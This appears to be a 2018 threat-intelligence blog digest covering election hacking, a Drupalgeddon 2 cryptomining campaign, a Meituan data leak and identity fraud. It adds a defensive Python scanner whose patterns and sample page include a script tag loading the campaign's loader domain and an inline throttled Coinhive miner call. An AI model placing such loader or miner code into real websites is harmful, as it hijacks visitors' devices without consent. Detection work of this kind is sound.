Threat Intelligence Blog

Posted May 15, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“The report summary released this week by the Senate intelligence committee gives an overview of initial findings focused on how Russian government operatives affected U.S. elections systems. The full report is undergoing a review to check for classified information. Two years after Russia’s wave of cyberattacks against American democracy, a Senate committee investigating election interference says those hackers hit harder than previously thought in several states. The committee also added that it still doesn’t know with complete certainty exactly how much of U.S. voting infrastructure was compromised. Committee members also said that they uncovered no evidence that any vote tallies were manipulated or that any voter registration data was deleted or changed, a finding that is similar to what the intelligence community and other lawmakers have said consistently since 2016. Some of the report’s other findings also are familiar: Russian cyber attackers targeted or scanned the elections systems in at least 21 states, and the Department of Homeland Security was slow in reaching out to the correct officials in those states to let them know.”



“Hundreds of websites running on the Drupal content management system – including those of the San Diego Zoo and the National Labor Relations Board – have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities. The attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability (CVE-2018-7600) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in question has been patched for over a month now. The cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive’s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors’ phones, tablets and computers. The domain used to inject the malware was vuuwd[.]com, according to Mursch. “Once the code was deobfuscated, the reference to ‘http://vuuwd[.]com/t.js’ was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.””
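A site owner checking whether their own Drupal pages carry this kind of injection can triage fetched HTML for the three signs the researcher describes: a script loaded from the reported loader domain, an external script on a host outside an allow-list, and inline Coinhive code (including the throttle setting). The scanner below is an added example, not code from the article or from Bad Packets Report; the allow-list host and the sample page are constructed, and the only real indicator it carries is the vuuwd[.]com domain quoted above.

```python
import re
from urllib.parse import urlparse

# Loader domain reported in the article, kept defanged as feeds deliver it.
KNOWN_LOADER_DOMAINS = {"vuuwd[.]com"}

# Strings typical of an inline Coinhive miner; the throttle pattern catches
# the "slightly throttled" configuration the researcher described.
MINER_PATTERNS = [
    re.compile(r"coinhive\.min\.js", re.I),
    re.compile(r"CoinHive\.Anonymous\s*\(", re.I),
    re.compile(r"throttle\s*:\s*0?\.\d+", re.I),
]
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)


def scan_html(html, allowed_hosts):
    """Return (finding_type, evidence) tuples; regex parsing is for triage only."""
    loaders = {d.replace("[.]", ".") for d in KNOWN_LOADER_DOMAINS}
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:  # external script: judge it by its host
            url = src.group(1)
            host = (urlparse(url).hostname or "").lower()
            if host in loaders:
                findings.append(("known_loader_domain", url))
            elif host and host not in allowed_hosts:  # relative URLs have no host
                findings.append(("unexpected_external_script", url))
            continue
        for pattern in MINER_PATTERNS:  # inline script: look for miner code
            match = pattern.search(body)
            if match:
                findings.append(("inline_miner_code", match.group(0)))
    return findings


# Constructed sample page, not a real capture: one legitimate Drupal script,
# the campaign's loader domain, and an inline throttled miner.
SAMPLE_HTML = """<html><head>
<script src="/core/misc/drupal.js"></script>
<script src="http://vuuwd.com/t.js"></script>
<script>var m = new CoinHive.Anonymous('SITEKEY', {throttle: 0.3}); m.start();</script>
</head><body>Welcome</body></html>"""


def scan_sample():
    return scan_html(SAMPLE_HTML, allowed_hosts={"www.example.org"})
```

Running the scanner against a crawl of your own site's pages, with the allow-list set to the CDN and analytics hosts you actually use, turns any `unexpected_external_script` finding into a lead worth deobfuscating.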


Information Security Risk

“Meituan Dianping, the internet giant backed by China’s most valuable tech corporation, has begun investigating reports of a data breach that exposed the private information of tens of thousands of users. The food-delivery and e-commerce giant said it’s working with police to investigate an alleged leak that’s drawn fire from concerned consumers and again cast doubt on the ability of Chinese web firms to safeguard sensitive personal information. In Meituan’s case, allegedly tens of thousands of data snippets — everything from names and mobile numbers to home addresses — on food-delivery customers went on sale online for as little as 0.1 yuan (2 cents) per item. “Because of the multiple parties involved in food delivery, such as merchants and third-party delivery services, some unlawful participants might have been able to gain access to information,” the company said in an emailed statement.”


Operational Risk

“The spread of breached identity information has resulted in an outbreak of new account creation fraud with a new ground zero for the crimes pointing right at Latin America. Developing economies are emerging as epicenters for global cybercrime expansion, with Brazil being in the top five attacking nations during the first quarter of the year. Those attacks center on neighboring countries such as Argentina and Colombia and spread into key digital economy areas in the U.S. and U.K. One-quarter of all account registrations from Latin America are being rejected as fraudulent, according to the first-quarter cybercrime report from a threat research company. The stolen and synthesized identities are being used to attack the growing Latin America e-commerce market, as well as major global American retail corporations.”
